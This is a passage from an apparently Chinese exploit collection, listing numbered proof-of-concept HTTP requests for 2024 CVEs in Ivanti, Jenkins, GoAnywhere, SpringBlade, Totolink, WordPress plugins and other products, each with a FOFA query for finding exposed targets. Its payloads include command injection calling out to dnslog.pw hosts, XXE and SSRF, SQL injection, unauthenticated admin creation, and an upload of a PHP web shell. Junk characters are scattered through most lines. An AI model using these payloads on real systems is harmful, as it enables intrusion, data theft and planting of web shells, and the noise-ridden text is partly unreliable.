Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! X' L4 M* `/ |5 k4 g0 g: S6 M pContent-Type: application/x-www-form-urlencoded; charset=UTF-81 g- ]5 \5 F g" J) f
X-Requested-With: XMLHttpRequest
+ X+ N6 v; o2 H+ ^1 C" B4 R: Y! M( b- l2 a
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B% v/ e9 l: @$ _: [' |+ Y
8 [4 q) s' @2 K# n" _' C* z
; s' W0 |* h/ j5 t; ~99. Ncast盈可视高清智能录播系统busiFacade RCE
9 q: z! M" U) C( |7 u/ c% qCVE-2024-0305
9 Y+ \ V( S, l4 rFOFA:app="Ncast-产品" && title=="高清智能录播系统"/ \$ x2 Y5 q+ Y: n
POST /classes/common/busiFacade.php HTTP/1.1
4 H f- P! e8 A* n( yHost: 192.168.40.130:8080
- p' p- {) s2 E" I% D; c6 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 a" `$ ^7 G: Z8 G
Connection: close( P% K8 ?( Z$ G; C& C" Z' C5 l
Content-Length: 154' r1 ~2 s' E9 j7 z0 {# \' v W/ {
Accept: */*
: U5 w. h% @0 M' ^Accept-Encoding: gzip, deflate/ S9 y; h& J }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 z$ C% c, g; I) k8 oContent-Type: application/x-www-form-urlencoded; charset=UTF-87 x! b8 j8 I7 D3 g5 l! b; r( M5 E
X-Requested-With: XMLHttpRequest
) [; C; o- q8 _0 T* U2 d
9 y k8 c3 X9 y' ?%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
+ P4 c0 X9 R+ L7 Z3 v" F! z, F" H& X2 t1 t- n
. y; ~1 U' x& {0 x. }7 {1 @100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
$ u$ `) K. D8 |/ N3 @CVE-2024-0352
) S) `- B& A5 e ?FOFA:icon_hash="874152924"0 A+ B3 j7 @+ Q
POST /api/file/formimage HTTP/1.13 L; x+ M# g& O
Host: 192.168.40.130
/ H4 G+ e3 `9 q. I. s, KUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 l( Q. f I) K8 \8 n
Connection: close
3 j* J6 ^5 U6 \( q# s% `4 GContent-Length: 201
; E! j+ O* `9 Z6 u$ MContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei! M3 w7 B, D; V3 W( m
Accept-Encoding: gzip
' @, _) ^1 v; L- y8 l/ i; Q
3 m( Z8 T. H+ `3 ^; h7 U; C# K------WebKitFormBoundarygcflwtei
4 ~7 D" d. d, ~* Y& K* ?Content-Disposition: form-data; name="file";filename="IE4MGP.php"
# N: Y/ _" |( E, l4 z6 t. k* ?- V+ m3 UContent-Type: application/x-php
' ^: B7 h$ \) R3 C
6 F! N% p, X: N2ayyhRXiAsKXL8olvF5s4qqyI2O5 J, H3 F' J7 N, Q$ @
------WebKitFormBoundarygcflwtei--
/ M3 L' }2 u3 d" r r" L8 P! N1 \$ |$ g0 G
2 `# q! i6 J; J2 p, ? D+ N* c101. ivanti policy secure-22.6命令注入
% P3 n! f7 N" n# h( {CVE-2024-21887
. { J4 |# d! h" ZFOFA:body="welcome.cgi?p=logo"
/ ]) m! c% n. jGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1+ Q: p+ R- x6 g* }6 x
Host: x.x.x.xx.x.x.x
/ y1 W6 o. U$ I' y& Z* LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; V0 o4 ?0 B. s8 q: X2 o, T: G) zConnection: close
# w* n( V% P3 C C- W4 r! ~Accept-Encoding: gzip
) B( G5 U& f2 \1 }- V3 E4 N5 E! ]+ X
' T7 M5 R" d! y! |! [# w- Z3 V8 K! g9 r$ r
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行2 O$ c+ ? {4 e
CVE-2024-21893
$ g1 G0 K% R! O% U1 ^FOFA:body="welcome.cgi?p=logo"
3 r# E5 q2 t7 |" vPOST /dana-ws/saml20.ws HTTP/1.1
) p# b* w; H v; z, oHost: x.x.x.x) f1 u0 [# t' i7 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: H' ~9 T V: e! I- P/ L
Connection: close8 s8 ]7 i0 o, x* _% f) `5 V! i
Content-Length: 792
s' W. h8 a+ ~, F$ PAccept-Encoding: gzip2 ?0 x, _, F* ?9 o% m& c C: H
9 k7 F% L5 N) N% i8 r4 }
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>: T& @( R0 R" F) H: f
; E3 Y2 d6 I! Z4 Y9 L$ Q2 ~7 Y. x
103. Ivanti Pulse Connect Secure VPN XXE$ Y' k- {2 v2 W$ i3 ?
CVE-2024-22024
8 X9 J7 u! q3 q2 ~% ]- YFOFA:body="welcome.cgi?p=logo"
; e+ {# V. G5 @1 Z1 } jPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
W+ M' x$ q# _ p! s; cHost: 192.168.40.130:111& }# W1 g9 x. R, N, H; ?. h
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.362 h7 Z' l, v o: h
Connection: close& g3 X4 S( X0 l6 A3 Y: O
Content-Length: 204, K3 T" z% a4 V3 R R
Content-Type: application/x-www-form-urlencoded0 r) t% d4 _4 k. N. n% ]! d
Accept-Encoding: gzip% |1 U! h; |- ]4 c% Z
( h& O' d+ @9 t( v- `SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
- d3 e5 {: x5 n$ D. v I# Q+ y& X v+ ?/ b/ W3 ]; A
- y" a* Y( r V5 b" p其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
$ \ s4 {) k3 M8 }9 B% Y<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
/ a+ {$ Y5 c+ H# e* U
, _6 w& W! k. M4 d5 `) T7 w! g% ]1 C1 r( k, j" o5 B8 G
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% O& g7 D; U: j6 R% d! vCVE-2024-0569) t% u: I4 d4 x
FOFA:title="TOTOLINK"
3 P2 h5 V" F" a% n- O r, i% h. u8 zPOST /cgi-bin/cstecgi.cgi HTTP/1.13 ?+ n( U2 f6 F" ^8 B, Y* H. V8 I
Host:192.168.0.11 X1 T/ r% o& v; i( Y8 {
Content-Length:41
4 Y. i# k% A$ `: W7 q- fAccept:application/json,text/javascript,*/*;q=0.01
2 l; p4 P2 ?, R5 A& d& x& \- S7 y# n: fX-Requested-with: XMLHttpRequest
4 ?- Y6 i6 Z3 Z3 c2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36! J) L) V D- ~% J+ V
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
& Y" o0 Y. v- ^) s$ u( \Origin: http://192.168.0.1
2 W8 }4 Q# z- B& S2 W0 dReferer: http://192.168.0.1/advance/index.html?time=1671152380564
0 P8 r3 \+ q0 Y/ V1 PAccept-Encoding:gzip,deflate/ E& Y0 S8 @7 G$ e
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
/ n9 r) l7 x7 dConnection:close m. [* `0 ~% ?) P m2 F$ t# u
5 B6 k) e3 `$ l4 J
{
) C+ k7 c( O% F' i/ N; x0 R w4 R( C"topicurl":"getSysStatusCfg",
3 P, f1 V1 v/ Q2 D5 B"token":""3 L: X6 u/ c7 H6 v
}
1 T7 z6 h1 a! E4 K) ?7 i7 x( w, |' ~; V% F1 }
105. SpringBlade v3.2.0 export-user SQL 注入
4 d) b# Y8 p wFOFA:body="https://bladex.vip"& u5 a. U# M) r1 Y
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
# }- H' y1 M' f; M) j- r' O( c% v9 ]. C* P6 ~; E& R" Q, U
106. SpringBlade dict-biz/list SQL 注入
$ ~: V( `# F& JFOFA:body="Saber 将不能正常工作"2 j0 t+ Y& S' T* _7 m
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
1 ?' g, j# T4 WHost: your-ip
- z6 A% A& }. n9 A4 S1 S, a0 S7 O+ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 W& o& ]3 q- D
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+ I0 B- s4 q! MAccept-Encoding: gzip, deflate
$ `* q2 U8 e# i. PAccept-Language: zh-CN,zh;q=0.9
1 C I O7 D: X8 x; C- H1 tConnection: close
3 ?3 o4 q; T7 Y3 T& w6 p
7 h) S4 ^ U; V9 X4 Y# E
- |2 R' y( l) M1 ~$ B5 k107. SpringBlade tenant/list SQL 注入
* B6 `* j c& TFOFA:body="https://bladex.vip"% t1 h! }* r. C$ c) u1 {
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.15 f j! f( e' o2 ^7 a) g
Host: your-ip
: u; n$ p( i2 ]5 o3 C4 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% H9 Y" X4 w0 P! h; x3 y# W
Blade-Auth:替换为自己的
- A! a( B2 q( B2 a6 EConnection: close
& x: G1 U* H+ b# i- s
6 `& T& G3 ^* S# q1 n9 y, k8 y1 s7 C1 Y6 t, w; o7 ~
108. D-Tale 3.9.0 SSRF- l. A: |: e3 N
CVE-2024-216420 c5 B y0 X7 V0 J' P6 i) x( W
FOFA:"dtale/static/images/favicon.png"
3 R3 D. }0 k; ~( t7 YGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.11 Z$ G; v& W8 Y0 _! o
Host: your-ip
2 R5 U/ s Z* AAccept: application/json, text/plain, */*
5 W7 }0 m. q% E( L; l; s/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- K% Y4 z. H" [# E' ]* oAccept-Encoding: gzip, deflate
% S' l5 ~0 D7 G6 @3 {1 |* nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
. h, M9 V' I+ E$ c* S1 T) l) EConnection: close
2 c) F# [' K3 t0 V
, U) E# Y2 L# g9 C' h3 l5 _
( H' X/ d/ g; m7 x" r$ _3 L109. Jenkins CLI 任意文件读取0 w! U/ ~/ A: n: o" ?8 s; x! L/ ]. \
CVE-2024-23897' l9 ~2 _* J6 A" D3 t L/ c1 K9 R
FOFA:header="X-Jenkins"
3 f+ o! |" b! {. @0 K- H# NPOST /cli?remoting=false HTTP/1.18 X+ L. a0 l% t; k
Host:' p6 r! v Z) h- P
Content-type: application/octet-stream/ J' z3 B* e0 b/ n" R# T
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e927 a' z, `2 t7 ?, m
Side: upload8 {& {1 z, F8 c% g5 p, ], [: A2 N
Connection: keep-alive
9 z4 W3 w7 q5 |2 `Content-Length: 163: i4 W. k( A# R0 i
; x4 ]8 @3 b; v8 l7 \8 k
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
* a. l8 E& G! `0 j% c" X& P i0 e, R+ p5 l8 a3 `
4 D1 H4 _( e+ DPOST /cli?remoting=false HTTP/1.18 `& { z4 \7 S4 s4 c: n: |
Host:. N* O* |0 ]* W4 T
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
2 R. M9 z- }$ [1 Z9 U. rdownload
8 w- U+ J5 L5 J: i* e* fContent-Type: application/x-www-form-urlencoded
' H. e* Y! e1 VContent-Length: 0+ u# ~) G' r; Y" t; [; R% ?, k7 G
9 D3 d! @1 p L; D' S$ Q3 O1 K% ]# N* e; f' W
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin- D) u. e9 p$ C9 D
java -jar jenkins-cli.jar help
2 c0 x* [) K4 Q& b' G$ @- x) l[COMMAND]8 X4 k$ X& c4 W0 D
Lists all the available commands or a detailed description of single command.9 A+ z# p9 j; ^7 {. S: p. p
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
: h, t( R; n7 Q3 w4 s$ `5 [6 G, ^0 q6 W& T+ e
; h; P1 V, O* ]7 v+ a110. Goanywhere MFT 未授权创建管理员" O f$ @$ e' h2 a& H
CVE-2024-0204
2 X+ A4 H, M1 G F# I; {# i( ~FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932" s9 c5 z' \2 m; ^% K
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1( { X, }, X! y* m) _( C0 Y7 r
Host: 192.168.40.130:8000
! P( l! {/ h( H$ E& i. rUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 m' ^5 N6 B8 }: U: R0 ~
Connection: close( h5 P" |; h6 d/ n$ T
Accept: */*& x; ?) b. f. O1 o/ S+ V
Accept-Language: en: d8 |# S! Q( d; c
Accept-Encoding: gzip
4 W. o" T; X( w( L3 J* i
" X ]' a6 Z; J, ?3 d4 e: Y+ W- Y
2 I6 R. l j/ O5 ^111. WordPress Plugin HTML5 Video Player SQL注入2 g4 @" a+ _$ I: m
CVE-2024-1061! l4 ~( W* x4 Y& r. V- P6 M& J* _" C9 ^
FOFA:"wordpress" && body="html5-video-player"0 ?' Q3 u+ \0 m+ r* }3 `% `
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; S# G% J8 E3 T( _Host: 192.168.40.130:1122 r3 k4 `: o3 b5 ]6 \. V* {; P6 L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) P4 m, r" L$ ^$ i, h
Connection: close7 g$ M Y4 @ O3 Y1 \
Accept: */*
' Z0 j0 ~/ p- J, xAccept-Language: en
; |3 h( F0 R3 R) S# E5 h jAccept-Encoding: gzip
1 M9 j( Q. z. W9 S5 V
8 x3 S* W1 e+ s* ~7 m5 M, o- }1 m }; q/ J0 t
112. WordPress Plugin NotificationX SQL 注入! \ {8 e4 \4 Y+ J$ o/ N
CVE-2024-16982 ~3 }. q; L u4 A! v. C3 d
FOFA:body="/wp-content/plugins/notificationx"! A* S' F1 O4 r9 Q& H
POST /wp-json/notificationx/v1/analytics HTTP/1.1
2 e) r1 }' A& S6 d) J6 EHost: {{Hostname}}7 a, U2 e7 h N: j0 l2 L, G- n
Content-Type: application/json& f& _ {% L+ _% _; I! I$ r0 A
9 b/ L& k! t! v' m- P* f/ e{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}: v% a+ v; Q3 x" B6 C" O% x4 V5 T
; \) n- @0 x& K1 i+ r- d' y! \; L
- N5 b5 ]8 |! c/ ^) r9 d* m
113. WordPress Automatic 插件任意文件下载和SSRF
% f; l5 U5 O) l/ Z7 z; Z: u9 j& tCVE-2024-27954 N- D* m+ s; V( M" m
FOFA:"/wp-content/plugins/wp-automatic"
9 W) u5 k4 x% [" v% ^; N* ]$ PGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.13 S4 V0 G1 i: P- A1 c
Host: x.x.x.x9 P/ A* W: b1 S; V
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
8 l: @' A* R3 b7 bConnection: close
* J! R9 q# I- o& f8 MAccept: */*
6 v& l. u1 W( Q3 UAccept-Language: en
6 O- I: L0 O5 ?" dAccept-Encoding: gzip7 T3 r+ e! l- J
( ~+ ^. ]5 j$ U5 U8 G. J
. _" N5 `4 U# {: K# g114. WordPress MasterStudy LMS插件 SQL注入7 E6 h$ ?3 ?1 R" N- i
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/", L8 |, A& S2 Z. I
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
; R. {" g$ j5 ^" FHost: your-ip
, t9 ]/ o6 B1 W) d2 b% r0 ^2 OUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* N7 }0 @3 X5 I2 a2 r2 u7 h0 X$ y1 QAccept-Charset: utf-8: X8 _% ~2 p" b' c
Accept-Encoding: gzip, deflate
) ^( I" Q7 p* [7 ?# N0 y1 QConnection: close
+ P2 A: }2 a$ o" w
0 }. Q5 F7 N3 p* |: q- n. Z
- @& Z0 A& o/ L' u8 F: _115. WordPress Bricks Builder <= 1.9.6 RCE
6 L- @) g- w2 g& u8 }$ j% XCVE-2024-256002 e L' m) n/ [+ X0 s9 T
FOFA: body="/wp-content/themes/bricks/"
- Y% Y' D4 v" Z$ c第一步,获取网站的nonce值% y$ _- Z% j9 l, F# c- z
GET / HTTP/1.12 l4 N% r8 {' b& d9 d' h
Host: x.x.x.x
1 f+ o' e5 x NUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
. d h7 F! ]& nConnection: close2 z* l! T7 u+ l/ g; z4 f. U
Accept-Encoding: gzip
3 Q0 g" J2 S' e6 c3 P- |7 r4 R# E. R$ C/ x! ]
# [: a& {6 w9 \! ~% K: C第二步替换nonce值,执行命令. r( S- v' s. }& B6 R N- `! Z: U
POST /wp-json/bricks/v1/render_element HTTP/1.1
4 F- |' _0 T$ f" C4 D! ZHost: x.x.x.x' Y: |7 h |* @. p/ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.364 J5 g) @) W. e: \ y/ R/ i3 n
Connection: close
3 }7 Z# L5 h$ N1 Q1 `+ cContent-Length: 3564 G9 w1 B( j$ a u
Content-Type: application/json
( @6 Z+ l* t1 N- m5 sAccept-Encoding: gzip( L% | T( P8 n5 ?+ e* |' d
2 ?& q- \; I& E4 Z7 m
{2 u, x. K0 V# ]6 N0 R
"postId": "1",
6 Q. p, X& `/ o& w4 n2 ] "nonce": "第一步获得的值",
1 Q0 {/ u3 t9 q# R: ^ "element": {
; z' g( y7 G$ P "name": "container", @; a3 @+ o( _: \; m
"settings": {' w0 ] R. E+ R
"hasLoop": "true",/ Y3 i3 _! n$ J# Y4 N
"query": {( `4 r& x! s; g+ w0 M
"useQueryEditor": true,- j! ]8 D& [0 |" y+ m! `6 F0 I' p3 }
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
- `6 t. r [+ d7 ]5 ^ "objectType": "post"
0 }6 |8 Z$ ]. X8 C3 E6 q }
: e3 W" p/ o/ f5 V% O9 t& L0 x }/ H) G" \6 D1 m$ D- v
}
: M9 U8 a, l( o* A( n}
2 ~) j$ t5 v; V# ]9 c0 ^8 I) Q+ v9 }/ v" ~
/ F" s1 y1 }1 Y$ o4 N1 w
116. wordpress js-support-ticket文件上传+ ?0 y1 I! t7 o# J6 W
FOFA:body="wp-content/plugins/js-support-ticket": Z2 G! a0 a3 h% {/ B. ?# s
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
+ x! r' C$ L/ H, H3 W% _" F1 P& THost:
# y' ?! b6 Z { L# p% X2 XContent-Type: multipart/form-data; boundary=--------767099171
& o( C$ {& F: H% _: V! l/ OUser-Agent: Mozilla/5.07 S/ o! E+ l5 E; B h
1 t4 L) |0 R; T2 ]# N: U
----------767099171
& v9 B q5 x. AContent-Disposition: form-data; name="action"
$ c) e7 v# _, P6 f6 H+ Wconfiguration_saveconfiguration" c: b1 |: r* e, E
----------767099171
0 G4 U3 U% k# ^3 L. ~8 DContent-Disposition: form-data; name="form_request"
$ b4 @) G0 D/ u2 {9 }* Kjssupportticket
+ f' A' A! U8 V( Z/ B$ G8 g5 ^----------767099171' ^, C8 b( t4 |
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
3 D% `! _' c) G" t s7 hContent-Type: image/png, Y6 H" g7 m6 w! Q6 |% g1 T) }
----------767099171--1 x2 b! {4 N3 I% a4 P, I: K. X/ u
( V c8 P4 A5 t9 c
: K; V' k# D& U, q! J3 K5 z1 }117. WordPress LayerSlider插件SQL注入
: o) S/ g3 ^# e9 Gversion:7.9.11 – 7.10.0& A; X* P, P# M% J3 U
FOFA:body="/wp-content/plugins/LayerSlider/"4 o: b( u, h) p- h
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1$ Z* ~) ^& m1 J M; x% Q
Host: your-ip8 [. c- i/ o/ ~' W P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 D- V l* c; T- Q( `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: b% W6 l) c4 H5 W3 G$ j5 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ i, Y# t H) q/ H2 U3 b& ~7 l( hAccept-Encoding: gzip, deflate, br: I% y% e- @" J: w
Connection: close+ y I3 P- ]8 t: C% d
Upgrade-Insecure-Requests: 1
) h2 h: x( _( Q0 D9 L" g0 d* }: }6 D# ~+ z2 s, |1 U( {
1 i" W4 D: B8 J. [; \: o: w( q. n118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
" }% \& ?; a6 X5 o% iCVE-2024-0939$ D. O" I6 S2 g0 Z! ?
FOFA:title="Smart管理平台"
8 W7 H. V. U6 R$ C5 yPOST /Tool/uploadfile.php? HTTP/1.19 _% A6 c& n+ [, P1 K9 G3 R
Host: 192.168.40.130:84434 C2 w% Q' r5 Z* }; ?* W7 a6 i: n
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f84 H; Z; X; r* A F" E" P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0% t0 B/ k' P6 r0 j5 J9 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ x! y' M" Y! ^6 \! p4 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% N6 [2 r# p( l' G2 @( A0 |Accept-Encoding: gzip, deflate
0 i, j1 ~' J+ j; m7 {1 IContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
8 I0 E* p+ W4 H# G% J3 XContent-Length: 405
% m) Z* [9 b+ N( HOrigin: https://192.168.40.130:84438 q/ P% o$ I, X# m: H; z3 a
Referer: https://192.168.40.130:8443/Tool/uploadfile.php& A( _& g3 g3 S' O
Upgrade-Insecure-Requests: 1
- y, w$ C% ~! Z$ jSec-Fetch-Dest: document$ ^1 H5 }) n4 o3 d. R0 T/ P( p
Sec-Fetch-Mode: navigate3 Z! `: p' g* l2 h
Sec-Fetch-Site: same-origin. Z, ^! u G+ E. d/ k+ ?5 E* a6 Z3 J
Sec-Fetch-User: ?14 ^/ _7 ]9 n, S! z1 [7 s6 R3 i
Te: trailers
. p7 J/ d1 p+ ~2 QConnection: close+ Z( w0 G' @8 c# p; {! k4 |. C
+ f6 B' @3 h% v+ S8 \. \-----------------------------13979701222747646634037182887+ w, \5 i8 q; H8 r
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
( l5 T3 ]" K6 ~5 A' s# T7 f; FContent-Type: application/octet-stream+ l- W7 c1 o3 Q" \
7 `) X1 i' h z, j( L; m
<?php6 r$ a) _/ K2 `) C
system($_POST["passwd"]);* K* f' W) V/ f3 x
?>
L0 i4 X' j1 r3 {0 h( k: }-----------------------------13979701222747646634037182887
# d& F* D0 `- ~; O0 x% l& GContent-Disposition: form-data; name="txt_path"
$ t( I" R4 i/ r ~6 O- V6 C' j9 m
1 X# _2 K p2 H' ?* x/home/src.php# L+ A7 H s6 h% |8 V5 I5 e# W
-----------------------------13979701222747646634037182887--8 i( n' g) b# ]8 M2 A& Q
7 W0 B! y B! O9 `/ k3 ~8 k& k8 M. s5 l7 u0 h1 U1 Y0 J
访问/home/src.php
* U4 @* ]: y0 R" R' O- K& g0 [6 Y6 Z: _
119. 北京百绰智能S20后台sysmanageajax.php sql注入: p$ `% a2 d# Y9 {( `* x
CVE-2024-1254# B# z% l2 F: z. T
FOFA:title="Smart管理平台"7 v1 V8 l/ g% [8 l1 ?( d
先登录进入系统,默认账号密码为admin/admin
2 K" ]3 h3 \& K7 H% b. \+ E8 F+ TPOST /sysmanage/sysmanageajax.php HTTP/1.11
5 n+ J" ]* u% L/ m, v$ H& JHost: x.x.x.x
0 J& W/ r# C) j$ \/ `, F( BCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
: O* @- B# q! ?# Z4 N: YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
2 Z7 i8 v9 y m" v* ?! xAccept: */*
8 i" V, {( P, s5 j. O! I& u1 _1 b0 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 X' X P0 \% |0 [$ m9 a$ kAccept-Encoding: gzip, deflate
. P$ r. ^1 f0 A3 yContent-Type: application/x-www-form-urlencoded;, z8 A! x. E; b1 t* Y
Content-Length: 109
# s( G1 T! I5 F; U: DOrigin: https://58.18.133.60:8443- f# X! I' h. S- `
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php. T9 J3 q/ I" a& d) p
Sec-Fetch-Dest: empty8 P" [# C4 f% u- T/ |) [
Sec-Fetch-Mode: cors
( }0 s/ `0 k6 D) dSec-Fetch-Site: same-origin) [/ O o B, G1 w! M: X% y) x* ~
X-Forwarded-For: 1.1.1.1
% n( ^) O0 q* f) B" Y( C# ^" h2 GX-Originating-Ip: 1.1.1.14 t1 n& J( N& n# n/ U
